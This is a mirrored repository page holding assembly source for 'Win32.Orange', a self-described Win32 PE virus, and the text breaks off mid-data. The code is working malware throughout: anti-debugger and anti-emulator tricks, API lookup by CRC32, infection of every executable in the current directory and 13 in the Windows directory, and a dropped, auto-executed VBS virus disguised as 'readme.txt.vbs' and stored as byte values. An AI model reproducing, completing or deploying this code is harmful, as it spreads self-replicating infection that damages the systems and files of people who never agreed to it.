mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 04:45:27 +00:00
1038 lines
25 KiB
NASM
1038 lines
25 KiB
NASM
|
;
|
||
|
; -Greetz to all 29Aerz,and iKX'erz-
|
||
|
;
|
||
|
; Win32.Orange [created by Ebola] paired with VBS/Orange2
|
||
|
;
|
||
|
; Type: Win32 PE infector
|
||
|
; Size: Approx 3.0KB
|
||
|
; Encrypted: Yes (1 layer)
|
||
|
; Polymorphic: No
|
||
|
; Optimized: Yes, CRC api's and somewhat optimized opcodes (damn I need lessons from Super/29A:)
|
||
|
; Payload: None, but drops a VBS virus.
|
||
|
; Misc. Features: Drops a VBS virus file and executes it. Several Anti-Debug,Anti-Emu features
|
||
|
; and last it uses lots of SEH
|
||
|
; Infections: All files in current directory and 13 files in the windows directory.
|
||
|
;
|
||
|
; Alright I believe this is my 2nd win32 virus release, my first one is zipped up with a
|
||
|
; password that I don't remember :). Anyway, this direct infector infects all files in current
|
||
|
; directory and 13 files in windows directory. It drops a VBS/Virus (VBS/Orange2).
|
||
|
;
|
||
|
; What's next? Probably gonna make a worm in win32asm.. :))
|
||
|
;
|
||
|
; Feelings (huh? I have no idea:)
|
||
|
;
|
||
|
; Even if you don't live in the U.S., I feel very vehement about what Bin Laden did
|
||
|
; to our country. I know everyone has their own opinions and I respect those opinions
|
||
|
; and I don't want to get into a little political war about how unfair the U.S. can
|
||
|
; be to other countries, but I think his billionaire ass should burn in hell. Speekin
|
||
|
; of BILLionaire ass, I will not be held responsible for any damages or any havoc that
|
||
|
; this software causes to any systems. I do not condone nor allow spreading of viruses
|
||
|
; so by spreading this virus you are involving yourself into the legal system and I will
|
||
|
; not go to court and support you.. In other words, I hold absolutely no responsibility
|
||
|
; towards this software and I only support beta testing. I made this out of experimentation
|
||
|
; on my computer and if you cause worldwide computer failure, I don't care - It's your
|
||
|
; fault, It's your bad, I have ABSOLUTELY NOTHING TO DO WITHIT!!!
|
||
|
;
|
||
|
; Okay, enough rambling, on with the source code, enjoy if you wish
|
||
|
;
|
||
|
; ONE MORE THING: Macro Assembler is the only good software M$ has ever made (AGAIN, NO
|
||
|
; POLITICAL BATTLES PLEASE.. :)
|
||
|
;
|
||
|
;** To be compiled with Masm 6.0: Check win32asm.cjb.net
|
||
|
;** Order of PUSHAD: (E)AX [1Ch], (E)CX [18h], (E)DX [14h], (E)BX [10h], (E)SP [0Ch], (E)BP [8h], (E)SI [4h], (E)DI [0h]
|
||
|
|
||
|
.386p
|
||
|
.model flat, stdcall
|
||
|
option casemap :none
|
||
|
|
||
|
include \masm32\include\windows.inc
|
||
|
|
||
|
@Delta_Handle MACRO
|
||
|
|
||
|
call markit
|
||
|
markit:
|
||
|
pop ebp
|
||
|
sub ebp,offset markit
|
||
|
|
||
|
ENDM
|
||
|
|
||
|
OS_WIN98 equ 1
|
||
|
OS_WINNT equ 2
|
||
|
|
||
|
.code
|
||
|
start:
|
||
|
virus_start = $
|
||
|
|
||
|
pushad
|
||
|
ASSUME FS: nothing
|
||
|
|
||
|
;** kill off some debuggers
|
||
|
call setupseh
|
||
|
mov esp,[esp+08h]
|
||
|
jmp fin
|
||
|
setupseh:
|
||
|
xor edx,edx
|
||
|
push dword ptr fs:[edx]
|
||
|
mov dword ptr fs:[edx],esp
|
||
|
|
||
|
xor eax,eax
|
||
|
mov dword ptr [eax],00h ; BAM!
|
||
|
|
||
|
fin:
|
||
|
xor edx,edx
|
||
|
pop dword ptr fs:[edx] ;** clear up the stack
|
||
|
pop edx
|
||
|
|
||
|
;** should be zero
|
||
|
mov ecx,fs:[20]
|
||
|
jecxz choker
|
||
|
|
||
|
;** locks em up all the time, muahaha
|
||
|
cli
|
||
|
jmp $-1
|
||
|
|
||
|
choker:
|
||
|
popad
|
||
|
|
||
|
;** First we must get the delta to access our data
|
||
|
@Delta_Handle
|
||
|
|
||
|
or ebp,ebp
|
||
|
jz monkey
|
||
|
|
||
|
mov esi,monkey
|
||
|
add esi,ebp
|
||
|
|
||
|
mov ecx,virus_end-monkey
|
||
|
push esi
|
||
|
pop edi
|
||
|
|
||
|
decrypt:
|
||
|
lodsb
|
||
|
not al ;not al
|
||
|
stosb
|
||
|
dec ecx
|
||
|
jecxz monkey
|
||
|
jmp decrypt
|
||
|
|
||
|
monkey = $
|
||
|
;** Next we find the kernel in memory
|
||
|
mov eax,[esp]
|
||
|
and eax,0FFFF0000h ; Just get the 32bit high word
|
||
|
|
||
|
loopgetkern:
|
||
|
|
||
|
sub eax,1000h ; Surf throught the pages
|
||
|
mov bx,word ptr [eax]
|
||
|
not bx ; protect from having 'MZ' in our code
|
||
|
cmp bx,not 'ZM' ; and check for a MZ header
|
||
|
jnz loopgetkern ; no, we keep checking
|
||
|
|
||
|
mov [ebp+kernel],eax
|
||
|
ring3:
|
||
|
xchg eax,ebx ;** silly anti-emu
|
||
|
mov ebx,ds ;aahh i love it
|
||
|
push ebx
|
||
|
pop ds ; playing with ds is surefire to throw something off
|
||
|
xchg eax,ebx
|
||
|
|
||
|
;** Find our current OS that we're on (NOTE: this may not work on WinME, i am not sure)
|
||
|
; works with Win98, Win95, WinNT, Win2000 though
|
||
|
; Taken from Billy Belcebu's great and huge virus writing guide, thanx billy!
|
||
|
|
||
|
mov ecx,cs
|
||
|
xor cl,cl
|
||
|
|
||
|
jecxz wNT
|
||
|
|
||
|
mov [ebp+CurrentOS],OS_WIN98
|
||
|
jmp prepare
|
||
|
wNT:
|
||
|
mov [ebp+CurrentOS],OS_WINNT
|
||
|
|
||
|
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
|
||
|
; OK, we have our OS down, next we find our API's
|
||
|
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
|
||
|
|
||
|
prepare:
|
||
|
|
||
|
mov esi,[ebp+kernel]
|
||
|
mov ebx,esi
|
||
|
mov esi,[esi+03ch]
|
||
|
add esi,ebx
|
||
|
|
||
|
mov ax,word ptr [esi]
|
||
|
not ax ; again, hide the 'PE' in the file as AV looks for this
|
||
|
cmp ax,not "EP" ; check for valid PE file
|
||
|
jnz no_kernel
|
||
|
|
||
|
add esi,78h ; Get to exports address
|
||
|
mov esi,[esi] ; go there
|
||
|
add esi,ebx
|
||
|
|
||
|
lea edi,[ebp+NumberOfNames] ; we are going to get info from exports table
|
||
|
|
||
|
add esi,018h
|
||
|
|
||
|
lodsd ; Get number of names,
|
||
|
stosd ; store it.
|
||
|
lodsd ; Get RVA of addresses,
|
||
|
stosd ; store it.
|
||
|
lodsd ; Get RVA of Names,
|
||
|
stosd ; store it.
|
||
|
lodsd ; Get RVA of Ordinals,
|
||
|
stosd ; store it.
|
||
|
; total 8 bytes :) usually takes alot more
|
||
|
|
||
|
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
|
||
|
; Locate our API's ****
|
||
|
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
|
||
|
|
||
|
lea esi,[ebp+CRC32_PROC]
|
||
|
mov ecx,[esi]
|
||
|
lea edi,[ebp+GetProcAddress]
|
||
|
|
||
|
loop_getem:
|
||
|
call Get_APICRC32
|
||
|
stosd
|
||
|
|
||
|
add esi,4
|
||
|
mov ecx,[esi]
|
||
|
|
||
|
jecxz done_finding_api
|
||
|
|
||
|
jmp loop_getem
|
||
|
|
||
|
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
|
||
|
;** Next we do some more tricks to get rid of
|
||
|
; debuggers or emulators
|
||
|
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
|
||
|
|
||
|
done_finding_api:
|
||
|
|
||
|
call dword ptr [ebp+IsDebuggerPresent] ; find application level debuggers
|
||
|
jz proceed ; none, proceed to SoftICE
|
||
|
|
||
|
; Put anti debug stuff here
|
||
|
cli
|
||
|
jmp $-1 ; hang the damn bitches
|
||
|
|
||
|
|
||
|
proceed:
|
||
|
|
||
|
call CheckSoftICE ; checks if SoftICE for 95/98/NT is in memory
|
||
|
or eax,eax ; check EAX
|
||
|
jz LoadingSequence ; load it up :)
|
||
|
|
||
|
jmp leaveth ; SoftICE detected, we're outta here
|
||
|
|
||
|
jmp LoadingSequence
|
||
|
|
||
|
;** Check for softice presence
|
||
|
|
||
|
CheckSoftICE:
|
||
|
|
||
|
push 00h
|
||
|
push 80h
|
||
|
push 03h
|
||
|
push 00h
|
||
|
push 01h
|
||
|
push 0c0000000h
|
||
|
lea esi,[ebp+SoftICE_Win9X]
|
||
|
push esi
|
||
|
call [ebp+CreateFileA]
|
||
|
|
||
|
inc eax
|
||
|
jnz si9x ; SoftICE for Win9X is active
|
||
|
dec eax
|
||
|
|
||
|
push eax
|
||
|
call [ebp+CloseHandle]
|
||
|
|
||
|
;--- check for NTice
|
||
|
|
||
|
push 00h
|
||
|
push 80h
|
||
|
push 03h
|
||
|
push 00h
|
||
|
push 01h
|
||
|
push 0c0000000h
|
||
|
lea esi,[ebp+SoftICE_WinNT]
|
||
|
push esi
|
||
|
call [ebp+CreateFileA]
|
||
|
|
||
|
inc eax
|
||
|
jnz siNT ; SoftICE for WinNT is active
|
||
|
dec eax
|
||
|
|
||
|
push eax
|
||
|
call [ebp+CloseHandle]
|
||
|
|
||
|
xor eax,eax
|
||
|
ret
|
||
|
|
||
|
si9x:
|
||
|
mov eax,01h ; SI for Win95/98
|
||
|
ret
|
||
|
siNT:
|
||
|
mov eax,02h ; for NT/2000
|
||
|
ret
|
||
|
|
||
|
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
|
||
|
;** Loading of virus components
|
||
|
Inf32_Counter dd 0
|
||
|
NumPasses dd 0
|
||
|
LoadingSequence:
|
||
|
|
||
|
dec dword ptr [ebp+Inf32_Counter] ; FFFFFFFF infections: basically every file
|
||
|
mov [ebp+NumPasses],2 ; 1st pass: curdir 2nd: windir
|
||
|
|
||
|
infpass:
|
||
|
;** Setup an SEH handler to protect our infection routine
|
||
|
call SetupSEH
|
||
|
mov esp,[esp+08h]
|
||
|
jmp DoneSEH
|
||
|
SetupSEH:
|
||
|
xor eax,eax
|
||
|
push dword ptr fs:[eax]
|
||
|
mov fs:[eax],esp
|
||
|
|
||
|
;+-+-+-+-+-+-+-+-+-+-+-
|
||
|
|
||
|
lea edi,[ebp+FindData]
|
||
|
push edi
|
||
|
lea eax,[ebp+FileMask]
|
||
|
push eax
|
||
|
|
||
|
call [ebp+FindFirstFileA] ; find the first file...
|
||
|
|
||
|
inc eax
|
||
|
jz leaveth
|
||
|
dec eax
|
||
|
mov ebx,eax
|
||
|
|
||
|
infect: push ebx ; save findhandle
|
||
|
|
||
|
push dword ptr [edi+20h] ; push the filesize
|
||
|
add edi,02Ch ; point to filename and..
|
||
|
push edi ; push
|
||
|
call InfectFile ; Infect the file!
|
||
|
|
||
|
pop ebx ; restore FindHandle (we modify EBX)
|
||
|
|
||
|
dec dword ptr [ebp+Inf32_Counter]
|
||
|
jz __next
|
||
|
|
||
|
lea edi,[ebp+FindData] ; re-initialize EDI
|
||
|
push edi
|
||
|
|
||
|
add edi,02Ch ; clear filename field (so no overwriting is done)
|
||
|
xor al,al
|
||
|
mov ecx,256
|
||
|
rep stosb
|
||
|
|
||
|
mov edi,[esp] ; restore EDI
|
||
|
|
||
|
push ebx ; find the next valid file
|
||
|
call [ebp+FindNextFileA]
|
||
|
|
||
|
or eax,eax
|
||
|
jnz infect
|
||
|
|
||
|
push ebx
|
||
|
call [ebp+FindClose]
|
||
|
|
||
|
;+-+-+-+-+-+-+-+-+-+-+-
|
||
|
|
||
|
DoneSEH:
|
||
|
xor eax,eax
|
||
|
pop dword ptr fs:[eax]
|
||
|
pop eax
|
||
|
|
||
|
__next:
|
||
|
dec dword ptr [ebp+NumPasses]
|
||
|
jz weredone
|
||
|
|
||
|
push 128
|
||
|
lea edi,[ebp+Buffer]
|
||
|
push edi
|
||
|
call [ebp+GetWindowsDirectoryA]
|
||
|
|
||
|
push edi
|
||
|
call [ebp+SetCurrentDirectoryA]
|
||
|
|
||
|
mov [ebp+Inf32_Counter],13
|
||
|
jmp infpass
|
||
|
|
||
|
weredone:
|
||
|
|
||
|
call InstallVBS ; extract the VBS file to the current directory
|
||
|
|
||
|
jmp leaveth
|
||
|
|
||
|
;********BEGINNING OF INFECTOR***************
|
||
|
|
||
|
InfectFile:
|
||
|
pop eax ; return address
|
||
|
pop esi ; file name
|
||
|
pop ecx ; file size
|
||
|
; pop edx ; file attribs
|
||
|
|
||
|
mov [ebp+addr_ret],eax
|
||
|
mov [ebp+filename],esi
|
||
|
mov [ebp+file_size],ecx
|
||
|
; mov [ebp+file_attr],edx
|
||
|
|
||
|
;save the old entry point and imagebase
|
||
|
mov ebx,[ebp+ImageBase]
|
||
|
mov [ebp+ib],ebx
|
||
|
mov ebx,[ebp+OldEIP]
|
||
|
mov [ebp+oe],ebx
|
||
|
;**--**
|
||
|
|
||
|
push ecx ; save it
|
||
|
|
||
|
push 080h ; wipe attributes off
|
||
|
push esi
|
||
|
call [ebp+SetFileAttributesA]
|
||
|
|
||
|
|
||
|
|
||
|
call Open ; i dont even bother checking if its valid, we find out after
|
||
|
mov ecx,[esp] ; it has been mapped
|
||
|
xchg eax,ebx
|
||
|
call GenMap ; map it in memory
|
||
|
xchg eax,ebx
|
||
|
mov ecx,[esp]
|
||
|
call MapIt
|
||
|
|
||
|
pop ecx
|
||
|
|
||
|
or eax,eax
|
||
|
jz close
|
||
|
|
||
|
|
||
|
|
||
|
cmp word ptr [eax],'ZM' ; is it a valid exe?
|
||
|
jnz close
|
||
|
|
||
|
mov esi,eax
|
||
|
mov esi,[esi+03ch] ; get to pe header
|
||
|
add esi,eax
|
||
|
|
||
|
cmp word ptr [esi],'EP' ; is it a PE/exe?
|
||
|
jnz close
|
||
|
|
||
|
cmp dword ptr [esi+04Ch],77661212h ; are we infected?
|
||
|
jz close
|
||
|
|
||
|
push dword ptr [esi+03Ch] ; save file alignment
|
||
|
|
||
|
|
||
|
|
||
|
call CLOSEPROC ; close file
|
||
|
|
||
|
mov eax,[ebp+file_size] ; put old size in eax
|
||
|
pop ecx
|
||
|
add eax,virus_end-virus_start ; make it the new size
|
||
|
|
||
|
call Factor ; factor it into the alignment
|
||
|
|
||
|
mov [ebp+file_size],eax ; store it again
|
||
|
xchg ecx,eax
|
||
|
|
||
|
|
||
|
|
||
|
push ecx
|
||
|
mov esi,[ebp+filename] ; reopen etc....
|
||
|
call Open
|
||
|
xchg eax,ebx
|
||
|
mov ecx,[esp]
|
||
|
call GenMap
|
||
|
xchg eax,ebx
|
||
|
mov ecx,[esp]
|
||
|
call MapIt
|
||
|
pop ecx
|
||
|
or eax,eax ; check make sure its valid
|
||
|
jz close
|
||
|
|
||
|
; proceed infection
|
||
|
|
||
|
mov esi,eax
|
||
|
push esi
|
||
|
pop ebx
|
||
|
mov esi,[esi+03ch]
|
||
|
add esi,ebx
|
||
|
movzx eax,word ptr [esi+06h] ; number of sections
|
||
|
dec eax ; - 1
|
||
|
imul eax,eax,28h ; gets us to last section
|
||
|
mov ebx,esi
|
||
|
add esi,78h+(8*10h) ; blah..
|
||
|
add esi,eax
|
||
|
|
||
|
|
||
|
|
||
|
or dword ptr [esi+24h],0a0000020h ; code,readable,writable
|
||
|
mov ecx,[esi+10h]
|
||
|
push ecx
|
||
|
mov edx,[esi+14h]
|
||
|
|
||
|
mov eax,[esi+0Ch]
|
||
|
add eax,ecx
|
||
|
|
||
|
mov edx,[ebx+28h] ; Old EIP
|
||
|
mov [ebp+OldEIP],edx
|
||
|
mov edx,[ebx+34h] ; image base
|
||
|
mov [ebp+ImageBase],edx
|
||
|
|
||
|
mov [ebx+28h],eax ; the new eip is stored
|
||
|
|
||
|
mov eax,ecx
|
||
|
add eax,virus_end-virus_start
|
||
|
mov ecx,[ebx+03Ch]
|
||
|
call Factor
|
||
|
|
||
|
mov [esi+10h],eax ; set the new sizes, this is physical size
|
||
|
mov [esi+08h],eax ; virtual size
|
||
|
mov edx,eax
|
||
|
|
||
|
mov ebx,[ebp+MappedView] ; need a handle again
|
||
|
|
||
|
mov edi,[esi+14h] ; Pointer to Raw Data (in PE header)
|
||
|
add edi,ebx ; point it to the end of the file (to write our virus)
|
||
|
pop ecx ; size of last section
|
||
|
add edi,ecx ; point to the end of last section
|
||
|
push esi ; save ESI
|
||
|
lea esi,[ebp+virus_start] ; ... you should know this :)
|
||
|
mov ecx,virus_end-virus_start ; setup the length of the virus
|
||
|
push ecx
|
||
|
|
||
|
rep movsb ; copy the virus there!
|
||
|
|
||
|
pop ecx
|
||
|
|
||
|
sub ecx,monkey-virus_start
|
||
|
sub edi,ecx
|
||
|
mov esi,edi
|
||
|
|
||
|
encrypt:
|
||
|
lodsb
|
||
|
not al
|
||
|
stosb
|
||
|
dec ecx
|
||
|
jecxz @bbcr
|
||
|
jmp encrypt
|
||
|
|
||
|
@bbcr:
|
||
|
pop esi ; restore ESI
|
||
|
|
||
|
mov eax,ebx ; fix it to point to PE header
|
||
|
mov ebx,[ebx+03Ch] ; e_lfanew
|
||
|
add ebx,eax ; normalize
|
||
|
|
||
|
mov eax,[esi+0Ch] ; VA address of last section
|
||
|
add eax,edx ; add our new length
|
||
|
mov [ebx+50h],eax ; and we have size of image
|
||
|
|
||
|
mov dword ptr [ebx+04Ch],77661212h ; mark it as infected
|
||
|
|
||
|
;** next we restore old image base and entrypoint
|
||
|
mov ebx,[ebp+ib]
|
||
|
mov eax,[ebp+oe]
|
||
|
mov [ebp+ImageBase],ebx
|
||
|
mov [ebp+OldEIP],eax
|
||
|
;**--**
|
||
|
|
||
|
close:
|
||
|
call CLOSEPROC
|
||
|
jmp setattr
|
||
|
|
||
|
setattr:
|
||
|
push dword ptr [ebp+file_attr]
|
||
|
push dword ptr [ebp+filename]
|
||
|
call [ebp+SetFileAttributesA]
|
||
|
|
||
|
exit_inf:
|
||
|
push [ebp+addr_ret]
|
||
|
|
||
|
ret
|
||
|
|
||
|
;***********************************************
|
||
|
; Infectors data, i just keep it in the proc
|
||
|
;***********************************************
|
||
|
|
||
|
dataset:
|
||
|
|
||
|
addr_ret dd 0
|
||
|
file_size dd 0
|
||
|
file_attr dd 80h
|
||
|
|
||
|
FileHandle dd 0
|
||
|
MappedFile dd 0
|
||
|
MappedView dd 0
|
||
|
|
||
|
filename dd 0
|
||
|
|
||
|
ib dd 0
|
||
|
oe dd 0
|
||
|
;***********************************************
|
||
|
; Infectors helper functions
|
||
|
;***********************************************
|
||
|
|
||
|
Factor:
|
||
|
pushad
|
||
|
xor edx,edx
|
||
|
push eax
|
||
|
div ecx
|
||
|
pop eax
|
||
|
sub ecx,edx
|
||
|
add eax,ecx
|
||
|
mov [esp+01Ch],eax
|
||
|
popad
|
||
|
ret
|
||
|
|
||
|
CLOSEPROC:
|
||
|
push dword ptr [ebp+MappedView]
|
||
|
call [ebp+UnmapViewOfFile]
|
||
|
|
||
|
push dword ptr [ebp+MappedFile]
|
||
|
call [ebp+CloseHandle]
|
||
|
|
||
|
push dword ptr [ebp+FileHandle]
|
||
|
call [ebp+CloseHandle]
|
||
|
ret
|
||
|
|
||
|
|
||
|
;** open file for read/write ESI = FileName
|
||
|
Open:
|
||
|
xor eax,eax
|
||
|
push eax
|
||
|
push eax
|
||
|
push 3h
|
||
|
push eax
|
||
|
push 1h
|
||
|
push 0C0000000h
|
||
|
push esi
|
||
|
call [ebp+CreateFileA]
|
||
|
mov [ebp+FileHandle],eax
|
||
|
ret
|
||
|
; ECX=Size EBX=FileHandle
|
||
|
GenMap:
|
||
|
xor eax,eax
|
||
|
push eax
|
||
|
push ecx
|
||
|
push eax
|
||
|
push 04h
|
||
|
push eax
|
||
|
push ebx
|
||
|
call [ebp+CreateFileMappingA]
|
||
|
mov [ebp+MappedFile],eax
|
||
|
ret
|
||
|
|
||
|
; ECX=Size EBX=Handle returned by GenMap
|
||
|
MapIt:
|
||
|
xor eax,eax
|
||
|
push ecx
|
||
|
push eax
|
||
|
push eax
|
||
|
push 02h
|
||
|
push ebx
|
||
|
call [ebp+MapViewOfFile]
|
||
|
mov [ebp+MappedView],eax
|
||
|
ret
|
||
|
|
||
|
;*********END OF INFECTOR****************
|
||
|
|
||
|
InstallVBS proc
|
||
|
|
||
|
lea esi,[ebp+vbsfile]
|
||
|
|
||
|
xor eax,eax
|
||
|
push eax
|
||
|
push eax
|
||
|
inc eax
|
||
|
push eax
|
||
|
dec eax
|
||
|
push eax
|
||
|
inc eax
|
||
|
push eax
|
||
|
push 0c0000000h
|
||
|
push esi
|
||
|
call [ebp+CreateFileA]
|
||
|
|
||
|
mov [ebp+FileHandle],eax
|
||
|
|
||
|
push eax
|
||
|
|
||
|
lea edi,[ebp+Buffer]
|
||
|
|
||
|
push 00h
|
||
|
push edi
|
||
|
push dword ptr [ebp+sizevbs]
|
||
|
lea esi,[ebp+vbsdata]
|
||
|
push esi
|
||
|
push eax
|
||
|
call [ebp+WriteFile]
|
||
|
|
||
|
call [ebp+CloseHandle]
|
||
|
|
||
|
;############################
|
||
|
|
||
|
lea esi,[ebp+_Shell32]
|
||
|
push esi
|
||
|
call [ebp+LoadLibraryA]
|
||
|
|
||
|
push eax
|
||
|
lea esi,[ebp+_ShellExecute]
|
||
|
push esi
|
||
|
push eax
|
||
|
call [ebp+GetProcAddress]
|
||
|
|
||
|
push 01h
|
||
|
push 00h
|
||
|
push 00h
|
||
|
lea esi,[ebp+vbsfile]
|
||
|
push esi
|
||
|
lea esi,[ebp+_OpenExecute]
|
||
|
push esi
|
||
|
push 00h
|
||
|
call eax
|
||
|
|
||
|
call [ebp+FreeLibrary]
|
||
|
|
||
|
;############################
|
||
|
|
||
|
ret
|
||
|
|
||
|
InstallVBS endp
|
||
|
|
||
|
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
|
||
|
;** Leave
|
||
|
|
||
|
no_kernel:
|
||
|
leaveth:
|
||
|
or ebp,ebp
|
||
|
jz firstgeneration
|
||
|
|
||
|
mov eax,00400000h
|
||
|
ImageBase equ $-4
|
||
|
add eax,00001000h
|
||
|
OldEIP equ $-4
|
||
|
|
||
|
jmp eax
|
||
|
|
||
|
firstgeneration:
|
||
|
push 0
|
||
|
call [ebp+ExitProcess]
|
||
|
|
||
|
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
|
||
|
;** Error handling and must-exit thingy's
|
||
|
;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*
|
||
|
|
||
|
;---------------------------------------
|
||
|
; Different functions we use *******
|
||
|
;---------------------------------------
|
||
|
|
||
|
CRC32 proc
|
||
|
cld
|
||
|
xor ecx,ecx ; Optimized by me - 2 bytes
|
||
|
dec ecx ; less
|
||
|
mov edx,ecx
|
||
|
NextByteCRC:
|
||
|
xor eax,eax
|
||
|
xor ebx,ebx
|
||
|
lodsb
|
||
|
xor al,cl
|
||
|
mov cl,ch
|
||
|
mov ch,dl
|
||
|
mov dl,dh
|
||
|
mov dh,8
|
||
|
NextBitCRC:
|
||
|
shr bx,1
|
||
|
rcr ax,1
|
||
|
jnc NoCRC
|
||
|
xor ax,08320h
|
||
|
xor bx,0EDB8h
|
||
|
NoCRC: dec dh
|
||
|
jnz NextBitCRC
|
||
|
xor ecx,eax
|
||
|
xor edx,ebx
|
||
|
dec edi ; 1 byte less
|
||
|
jnz NextByteCRC
|
||
|
not edx
|
||
|
not ecx
|
||
|
mov eax,edx
|
||
|
rol eax,16
|
||
|
mov ax,cx
|
||
|
ret
|
||
|
CRC32 endp
|
||
|
|
||
|
;** Finds api address via CRC32 of Api name
|
||
|
; portions of this code used from Billy Belcebu's win32 viruswriting guide
|
||
|
; thanx billy :)
|
||
|
; expects ecx to be crc32 of api, ebx to be kernel base
|
||
|
Get_APICRC32 PROC
|
||
|
|
||
|
pushad ; save all of the registers - required...
|
||
|
|
||
|
mov edx,[ebp+ExportNameRVA] ; open the export table
|
||
|
add edx,ebx
|
||
|
mov edi,[edx]
|
||
|
add edi,ebx
|
||
|
|
||
|
and dword ptr [ebp+ExportCounter],00h ; clear the counter
|
||
|
|
||
|
loop_check_crc: ; Soma this code was taken from billy belcebu's guide to virus writing for win32
|
||
|
|
||
|
mov esi,edi ; save edi in esi
|
||
|
xor al,al ; find the length
|
||
|
scasb
|
||
|
jnz $-1
|
||
|
sub edi,esi ; .. solve it
|
||
|
pushad ; save all regs
|
||
|
push ecx ; save ecx as it is important
|
||
|
call CRC32
|
||
|
pop ecx ; restore ecx
|
||
|
cmp eax,ecx ; compare the two CRC32's
|
||
|
jnz next_api ; no match
|
||
|
popad ; a match, restore regs and find the address
|
||
|
jmp found
|
||
|
|
||
|
next_api:
|
||
|
popad ; restore the regs
|
||
|
inc dword ptr [ebp+ExportCounter] ; increase counter
|
||
|
|
||
|
add edx,4
|
||
|
mov edi,[edx]
|
||
|
add edi,ebx
|
||
|
|
||
|
jmp loop_check_crc ; all over a gain
|
||
|
|
||
|
found:
|
||
|
xor eax,eax ; clear eax
|
||
|
mov eax,dword ptr [ebp+ExportCounter] ; put the counter in it
|
||
|
|
||
|
mov esi,[ebp+ExportOrdinalRVA] ; put the ordinal RVA...
|
||
|
shl eax,1
|
||
|
add esi,eax
|
||
|
add esi,ebx ; ok now we get the ordinal
|
||
|
|
||
|
lodsw ; we have it
|
||
|
|
||
|
shl ax,2 ; Ordinal*4+KernelBase+AddressOfAddy's equals /
|
||
|
; pointer to function address!
|
||
|
mov esi,[ebp+ExportAddressRVA]
|
||
|
add esi,ebx
|
||
|
add esi,eax
|
||
|
lodsd ; get the data pointed to
|
||
|
add eax,ebx ; normalize by kernel
|
||
|
mov [ebp+save],eax ; save it for we restore all registers now
|
||
|
|
||
|
popad ; restore'em
|
||
|
|
||
|
mov eax,[ebp+save] ; put into eax
|
||
|
|
||
|
ret ; and return with our new found addy
|
||
|
|
||
|
save dd 0
|
||
|
|
||
|
Get_APICRC32 endp
|
||
|
;----------------------------------------
|
||
|
; The VBS/Worm
|
||
|
;----------------------------------------
|
||
|
_OpenExecute db "open",0
|
||
|
_ShellExecute db "ShellExecuteA",0
|
||
|
_Shell32 db "Shell32.dll",0
|
||
|
|
||
|
vbsfile db "readme.txt.vbs",0
|
||
|
vbsdata db 67,97,108,108,32,118,98,115,78,101,99,116,111,114,13,10
|
||
|
db 87,83,99,114,105,112,116,46,113,117,105,116,13,10,39,13
|
||
|
db 10,83,117,98,32,118,98,115,78,101,99,116,111,114,40,41
|
||
|
db 13,10,68,105,109,32,118,105,13,10,13,10,83,101,116,32
|
||
|
db 115,32,61,32,87,83,99,114,105,112,116,46,65,114,103,117
|
||
|
db 109,101,110,116,115,13,10,83,101,116,32,111,98,106,83,104
|
||
|
db 101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101
|
||
|
db 99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108
|
||
|
db 108,34,41,13,10,83,101,116,32,102,115,32,61,32,67,114
|
||
|
db 101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105
|
||
|
db 112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109
|
||
|
db 79,98,106,101,99,116,34,41,13,10,77,121,115,99,114,105
|
||
|
db 112,116,32,61,32,87,83,99,114,105,112,116,46,83,99,114
|
||
|
db 105,112,116,70,117,108,108,78,97,109,101,13,10,83,101,116
|
||
|
db 32,102,32,61,32,102,115,46,111,112,101,110,116,101,120,116
|
||
|
db 102,105,108,101,40,77,121,115,99,114,105,112,116,44,49,41
|
||
|
db 13,10,118,105,114,32,61,32,102,46,82,101,97,100,65,108
|
||
|
db 108,13,10,102,46,99,108,111,115,101,13,10,83,101,116,32
|
||
|
db 102,32,61,32,78,111,116,104,105,110,103,13,10,73,102,32
|
||
|
db 73,110,83,116,114,40,49,44,76,67,97,115,101,40,77,121
|
||
|
db 115,99,114,105,112,116,41,44,34,114,101,97,100,109,101,46
|
||
|
db 116,120,116,46,118,98,115,34,44,49,41,32,84,104,101,110
|
||
|
db 13,10,111,98,106,83,104,101,108,108,46,82,101,103,87,114
|
||
|
db 105,116,101,32,34,72,75,69,89,95,67,76,65,83,83,69
|
||
|
db 83,95,82,79,79,84,92,86,66,83,70,105,108,101,92,83
|
||
|
db 104,101,108,108,92,79,112,101,110,92,67,111,109,109,97,110
|
||
|
db 100,92,34,44,102,115,46,71,101,116,83,112,101,99,105,97
|
||
|
db 108,70,111,108,100,101,114,40,48,41,32,43,32,34,92,87
|
||
|
db 83,99,114,105,112,116,46,69,88,69,32,34,32,43,32,77
|
||
|
db 121,115,99,114,105,112,116,32,43,32,34,32,37,49,32,34
|
||
|
db 32,43,32,67,104,114,40,51,52,41,32,43,32,102,115,46
|
||
|
db 71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114
|
||
|
db 40,48,41,32,43,32,34,92,87,83,99,114,105,112,116,46
|
||
|
db 69,88,69,32,34,32,43,32,67,104,114,40,51,52,41,32
|
||
|
db 43,32,34,37,49,34,32,43,32,67,104,114,40,51,52,41
|
||
|
db 32,43,32,34,32,37,42,34,32,43,32,67,104,114,40,51
|
||
|
db 52,41,13,10,69,110,100,32,73,102,13,10,13,10,73,102
|
||
|
db 32,115,46,67,111,117,110,116,32,62,32,49,32,84,104,101
|
||
|
db 110,13,10,9,9,83,101,116,32,102,32,61,32,102,115,46
|
||
|
